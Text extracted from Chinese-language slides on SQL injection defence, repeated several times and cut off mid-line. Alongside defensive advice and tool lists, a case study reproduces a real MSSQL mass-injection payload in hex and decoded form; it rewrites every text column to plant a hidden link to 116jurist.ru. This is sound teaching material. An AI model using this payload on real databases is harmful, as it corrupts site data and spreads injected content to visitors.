bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection ndash 延伸思考
bull INSERT 與 UPDATE 的攻擊可能發生嗎
bull NoSQL 沒有 SQL Injection
bull 其他攻擊利用
ndash Deep Blind Injection
ndash Error-Based Injection
bull Duplicate Error
bull Function
ndash information_schema
ndash 使用者自訂函數(User-Defined Functions)
ndash 觸發(Trigger)
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
SQL Injection ndash 自動化工具
bull Havij
bull Pangolin
bull w3af
bull Jsky
bull SQLmap
bull hellip
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
stylegtltdiv class=a4twgtlta href=http116juristrugtthornethegraveaumlegravedividearingntildeecircegravearing-oacutentildeeumloacuteatildeegrave-igraveicircntildeecircacircagraveltagtltdivgt ) FETCH NEXT FROM
Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
參考資料
bull 吳翰清 網路竟然這麼危險(白帽子讲Web安全) 2012
bull MySQL String Functions 51
bull MySQL Miscellaneous Functions 51
bull MySQLPHP 对单引号转义时load_fileoutfile 生成一句话
bull Shazin Sadakath Time Based SQL Injection using heavy queries in
MySQL
bull Stefan Esser MySQL and SQL Column Truncation Vulnerabilities 2008
正確地防禦SQL Injection
bull 最低權限原則
bull 使用預先編譯敘述
bull 使用預存函數
bull 使用UTF8避免使用BIG5或GBK
bull 檢查資料型態與強制轉型
ndash bool settype(mixed amp$var string $type)
ndash intval doubleval
bull 使用安全函數
ndash OWASP ESAPI
bull MySQLCodec
MSSQL實際案例 - 116juristru自動化注入(14)
bull 201212xx 100331
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e313020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d535542535452494e47285b272b40432b275d2c20312c204348415249
4e4445582827273c2f7469746c653e3c27272c5b272b40432b275d29202d203129207768657265205b272b
40432b275d206c696b65202727253c2f7469746c653e3c252727202729204645544348204e455854204652
4f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c4f5345205461626c655f43
7572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(24)
bull 201212xx 100333
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e323020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827414c544552205441424c45205b272
b40542b275d20414c54455220434f4c554d4e205b272b40432b275d207661726368617228383030302920
4e4f54204e554c4c2729204645544348204e4558542046524f4d205461626c655f437572736f7220494e544
f2040542c404320454e4420434c4f5345205461626c655f437572736f72204445414c4c4f434154452054616
26c655f437572736f72+as+varchar(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入(34)
bull 201212xx 100344
bull Serno=51+declare+s+varchar(8000)+set+s=cast(0x73657420616e73695f7761726e696e6773206f66
66204445434c415245204054205641524348415228323535292c404320564152434841522832353529204
445434c415245205461626c655f437572736f7220435552534f5220464f522073656c65637420632e544142
4c455f4e414d452c632e434f4c554d4e5f4e414d452066726f6d20494e464f524d4154494f4e5f534348454d4
12e636f6c756d6e7320632c20494e464f524d4154494f4e5f534348454d412e7461626c6573207420776865
726520632e444154415f5459504520696e2028276e76617263686172272c2776617263686172272c276e74
657874272c2774657874272920616e6420632e4348415241435445525f4d4158494d554d5f4c454e475448
3e383020616e6420742e7461626c655f6e616d653d632e7461626c655f6e616d6520616e6420742e746162
6c655f747970653d2742415345205441424c4527204f50454e205461626c655f437572736f7220464554434
8204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c4043205748494c45284040
46455443485f5354415455533d302920424547494e20455845432827555044415445205b272b40542b275
d20534554205b272b40432b275d3d434f4e5645525428564152434841522838303030292c5b272b40432b
275d292b27273c2f7469746c653e3c7374796c653e2e613474777b706f736974696f6e3a6162736f6c75746
53b636c69703a726563742834353770782c6175746f2c6175746f2c3435377078293b7d3c2f7374796c653e
3c64697620636c6173733d613474773e3c6120687265663d687474703a2f2f3131366a75726973742e7275
203efef0e8e4e8f7e5f1eae8e52df3f1ebf3e3e82deceef1eae2e03c2f613e3c2f6469763e27272027292046455
44348204e4558542046524f4d205461626c655f437572736f7220494e544f2040542c404320454e4420434c
4f5345205461626c655f437572736f72204445414c4c4f43415445205461626c655f437572736f72+as+varc
har(8000))+exec(s)--
MSSQL實際案例 - 116juristru自動化注入解碼(44)
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt10 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET [+C+]=SUBSTRING([+C+] 1 CHARINDEX(lttitlegtlt[+C+]) - 1) where [+C+]
like lttitlegtlt ) FETCH NEXT FROM Table_Cursor INTO TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt20 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(ALTER TABLE [+T+] ALTER COLUMN [+C+] varchar(8000) NOT NULL) FETCH NEXT FROM Table_Cursor INTO
TC END CLOSE Table_Cursor DEALLOCATE Table_Cursor
bull
bull set ansi_warnings off DECLARE T VARCHAR(255)C VARCHAR(255) DECLARE Table_Cursor CURSOR FOR select
cTABLE_NAMEcCOLUMN_NAME from INFORMATION_SCHEMAcolumns c INFORMATION_SCHEMAtables t where cDATA_TYPE
in (nvarcharvarcharntexttext) and cCHARACTER_MAXIMUM_LENGTHgt80 and ttable_name=ctable_name and
ttable_type=BASE TABLE OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO TC WHILE(FETCH_STATUS=0)
BEGIN EXEC(UPDATE [+T+] SET
[+C+]=CONVERT(VARCHAR(8000)[+C+])+lttitlegtltstylegta4twpositionabsolutecliprect(457pxautoauto457px)lt
